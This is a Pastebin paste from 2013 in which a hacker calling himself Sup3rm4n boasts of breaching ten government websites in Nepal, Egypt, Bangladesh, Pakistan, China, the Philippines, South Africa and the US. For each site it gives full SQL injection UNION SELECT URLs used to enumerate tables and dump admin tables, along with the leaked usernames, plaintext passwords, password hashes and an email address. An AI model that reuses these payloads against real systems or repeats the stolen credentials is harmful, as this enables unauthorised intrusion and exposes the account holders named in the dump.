supermanavc

10 WEBSITES .GOV HACKED BY SUP3RM4N - CYBER HATS

May 1st, 2013
1,127
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # 10 WEBSITES .GOV HACKED BY SUP3RM4N - CYBER HATS
  2.  
  3. target:http://eproc.dor.gov.np/
  4.  
  5. vul:http://eproc.dor.gov.np/tender_details.php?tid=-1936
  6.  
  7. tables --> http://eproc.dor.gov.np/tender_details.php?tid=-1936+union+select+0,group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables%20where%20table_schema=database()--
  8.  
  9. tbl_acknowledgement
  10. tbl_addenda
  11. tbl_admin_info
  12. tbl_adminlogin
  13. tbl_agency
  14. tbl_agency_category
  15. tbl_announcement
  16. tbl_archive_auction
  17. tbl_archive_tender
  18. tbl_award
  19. tbl_award1
  20. tbl_bid
  21. tbl_bid_document
  22. tbl_bid_document_additional
  23. tbl_bid_document_migrated
  24. tbl_bid_modification
  25. tbl_clarification
  26. tbl_company_category
  27. tbl_contract
  28. tbl_customer
  29.  
  30.  
  31. dump adminlogin --> http://eproc.dor.gov.np/tender_details.php?tid=-1936+union+select+0,pass_word,2,3,4,5,6,7,8,9,10,11,12+from+tbl_adminlogin
  32.  
  33. user:admin
  34. pass:0aab2640ced6d6defd09afc2c716abdf
  35.  
  36.  
  37.  
  38. -------------------------------------------------------------------------------------------------
  39.  
  40. target:http://www.eeaa.gov.eg/
  41.  
  42. vul:http://www.eeaa.gov.eg/arabic/main/allnews.asp?Article_Id=-1
  43.  
  44. dump login --> http://www.eeaa.gov.eg/arabic/main/allnews.asp?Article_Id=-1+union+select+0,username,password,3,4,5,6+from+login
  45.  
  46. user:adm
  47. pass:adm123
  48.  
  49. user:cdeca
  50. pass:cdeca06
  51.  
  52. user:ind
  53. pass:ind123
  54.  
  55. user:media
  56. pass:media184
  57.  
  58.  
  59. ------------------------------------------------------------------------------------------------
  60.  
  61.  
  62. target:http://www.rab.gov.bd/
  63.  
  64. vul:http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0
  65.  
  66. tables--> http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=database()
  67.  
  68. achievement
  69. achievement_cat
  70. activity
  71. appreciation
  72. arms_vehicle
  73. award
  74. battalion_history
  75. bookmark
  76. complain_rab
  77. complain_terror
  78. contact_us
  79. content
  80. crime
  81. forum_badwords
  82. forum_bannedip
  83. forum_post
  84. forum_topics
  85. hit_statistics
  86. hitcounter
  87. leftpanel_pic
  88. location
  89. lost_found
  90. lost_people
  91. member
  92. messages
  93. most_wanted
  94. news,notice
  95. our_tip
  96. panel_user
  97. photo_gallery
  98. pic_cat
  99. police_form
  100. predecessors
  101. publication
  102. rab_location
  103. related_link
  104. telephone_dir
  105. tender
  106. tips
  107. video
  108. wings
  109.  
  110. http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%22panel_user%22--
  111.  
  112. dump panel_user--> http://www.rab.gov.bd/about_us.php?page=2-1+and+1=0+UNION+SELECT+1,2,group_concat(user_type,0x3a,user_email,0x3a,user_login,0x3a,user_pass),4%20from%20panel_user--
  113.  
  114. data operator
  115. email:titu_nupur@yahoo.com
  116. user:web123
  117. pass:*bolbona007
  118. administrator
  119. email:titu_nupur@yahoo.com
  120. user:nazimnavy
  121. pass:*bolbona007
  122.  
  123. -------------------------------------------------------------------------------------------------
  124.  
  125.  
  126. target:http://www.commerce.gov.pk/
  127.  
  128. vul:http://www.commerce.gov.pk/ptmaview.php?ID=-32
  129.  
  130. tables --> http://www.commerce.gov.pk/ptmaview.php?ID=-32+union+select+1%2C2%2C3%2Cgroup_concat(table_name)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+information_schema.tables+where+table_schema%3Ddatabase()--
  131.  
  132. bot,moc_directory
  133. moc_jobs
  134. moc_notification
  135. moc_old_notification
  136. moc_tenders
  137. trademissiondirectory
  138. wp_moc_commentmeta
  139. wp_moc_comments
  140. wp_moc_directory
  141. wp_moc_jobs
  142. wp_moc_links
  143. wp_moc_newsletter
  144. wp_moc_ngg_album
  145. wp_moc_ngg_gallery
  146. wp_moc_ngg_pictures
  147. wp_moc_notification
  148. wp_moc_options
  149. wp_moc_postmeta
  150. wp_moc_posts
  151. wp_moc_tenders
  152. wp_moc_term_
  153.  
  154.  
  155. --------------------------------------------------------------------------------------------------
  156.  
  157.  
  158. target:http://www.ykxs.gov.cn/
  159.  
  160. vul:http://www.ykxs.gov.cn/jg_view.php?id=141
  161.  
  162. tables --> http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
  163.  
  164. 1cpclass
  165. 1datainfo
  166. 1pic
  167. 2datainfo
  168. administrator
  169. administrator5
  170. bbsclass
  171. bbsinfo
  172. class
  173. class5
  174. datainfo
  175. datainfo5
  176. goods
  177. nyy_administrator5
  178. pic
  179. wd
  180. web_config5
  181. xs_data
  182. xs_pic
  183. xs_tp
  184.  
  185. columns -- http://www.ykxs.gov.cn/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()--
  186.  
  187.  
  188. ---------------------------------------------------------------------------------------------------
  189.  
  190. target:http://www.sisonlgu.gov.ph/
  191.  
  192. vul:http://www.sisonlgu.gov.ph/announce.php?id=-6
  193.  
  194. tables --> http://www.sisonlgu.gov.ph/announce.php?id=-6+UNION+SELECT+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
  195.  
  196. announcements
  197. barangays
  198. comments
  199. congressman_reports
  200. demography
  201. departments
  202. downloads
  203. employees
  204. events
  205. features
  206. feedback
  207. links
  208. mayor_reports
  209. multimedia
  210. news
  211. officials
  212. photo_gallery
  213. pictures
  214. police_reports
  215. poll_questions
  216. pruducts
  217. sanggunian_enactments
  218. sports
  219. threads
  220. tourist_destinations
  221.  
  222. columns --> http://www.sisonlgu.gov.ph/announce.php?id=-6+union+select+1,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()--
  223.  
  224.  
  225. ---------------------------------------------------------------------------------------------------
  226.  
  227. target:http://www.tchjbh.gov.cn/
  228.  
  229. vul:http://www.tchjbh.gov.cn/news_display.php?id=148
  230.  
  231. tables --> http://www.tchjbh.gov.cn/news_display.php?id=148%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21%20from+information_schema.tables+where+table_schema=database()--
  232.  
  233. admin_authority
  234. admin_login
  235. admininfo
  236. advanced
  237. big_class
  238. count,files
  239. info
  240. information1
  241. ip
  242. message
  243. sec_class
  244. third_class
  245. tqinfo
  246. vote
  247.  
  248. dump admininfo--> http://www.tchjbh.gov.cn/news_display.php?id=148%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(username,0x2f,passwd),15,16,17,18,19,20,21%20from%20admininfo--
  249.  
  250. user:admin
  251. pass:25b9e816781be124c4e070f1e776ad7e
  252.  
  253.  
  254. -------------------------------------------------------------------------------------------------------
  255.  
  256. target:http://www.dpe.gov.za/
  257.  
  258. vul:http://www.dpe.gov.za/home.php?id=-1
  259.  
  260. tables --> http://www.dpe.gov.za/home.php?id=-1+union+all+select+1%2C2%2C3%2Cgroup_concat%28table_name%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15+from+information_schema.tables+where+table_schema=database()--
  261.  
  262. NAVIGATION
  263. SURVEY_2008
  264. CONTENT
  265. SITECONTENT
  266. SUBSCRIBERS
  267. TBLSTATS
  268. TEMPNAVIGATION
  269. TOOLS
  270. USERS
  271.  
  272. dump users --> http://www.dpe.gov.za/home.php?id=-1+union+all+select+1%2C2%2C3%2Cconcat%28UserName%2C0x3a%2CPassword%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15+from+users--
  273.  
  274. user:ANDREW
  275. pass:ANDREw
  276.  
  277.  
  278. --------------------------------------------------------------------------------------------------------
  279.  
  280. target:http://www.murrayky.gov/
  281.  
  282. vul:http://www.murrayky.gov/showevent.htm?ID=123
  283.  
  284. tables --> http://www.murrayky.gov/showevent.htm?ID=123+union+select+1%2C2%2C3%2C4%2C5%2Ctable_name%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16+from+information_schema.tables--
  285.  
  286. CHARACTER_SETS
  287. COLLATIONS
  288. COLLATION_CHARACTER_SET_APPLICABILITY
  289. COLUMNS
  290. COLUMN_PRIVILEGES
  291. KEY_COLUMN_USAGE
  292. PROFILING
  293. ROUTINES
  294. SCHEMATA
  295. SCHEMA_PRIVILEGES
  296. STATISTICS
  297. TABLES
  298. TABLE_CONSTRAINTS
  299. TABLE_PRIVILEGES
  300. TRIGGERS
  301. USER_PRIVILEGES
  302. VIEWS
  303. 2010events
  304. citybusiness
  305. contentman
  306. contentmanperson
  307. contentmanpolice
  308. datEvents
  309. datSettings
  310.  
  311. ------------------------------------------------------------------------------------------------------
  312.  
  313. target:http://clothing.pof.gov.pk/
  314.  
  315. vul:http://clothing.pof.gov.pk/portfolio.php?id=-1
  316.  
  317. tables --> http://clothing.pof.gov.pk/portfolio.php?id=-1+union+select+1%2C2%2Cgroup_concat(table_name)%2C4%2C5+from+information_schema.tables%20where%20table_schema=database()--
  318.  
  319.  
  320. admin
  321. category
  322. contact
  323. machines
  324. metatags
  325. news
  326.  
  327. dump admin --> http://clothing.pof.gov.pk/portfolio.php?id=-1+union+select+1%2C2%2Cadmin_resu%2C4%2C5+from+admin
  328.  
  329. user:admin
  330. pass:$hi&T=ER.Tth
  331.  
  332. #SUP3RM4N
  333. ----------------------------------------------------------------------------------------------------
RAW Paste Data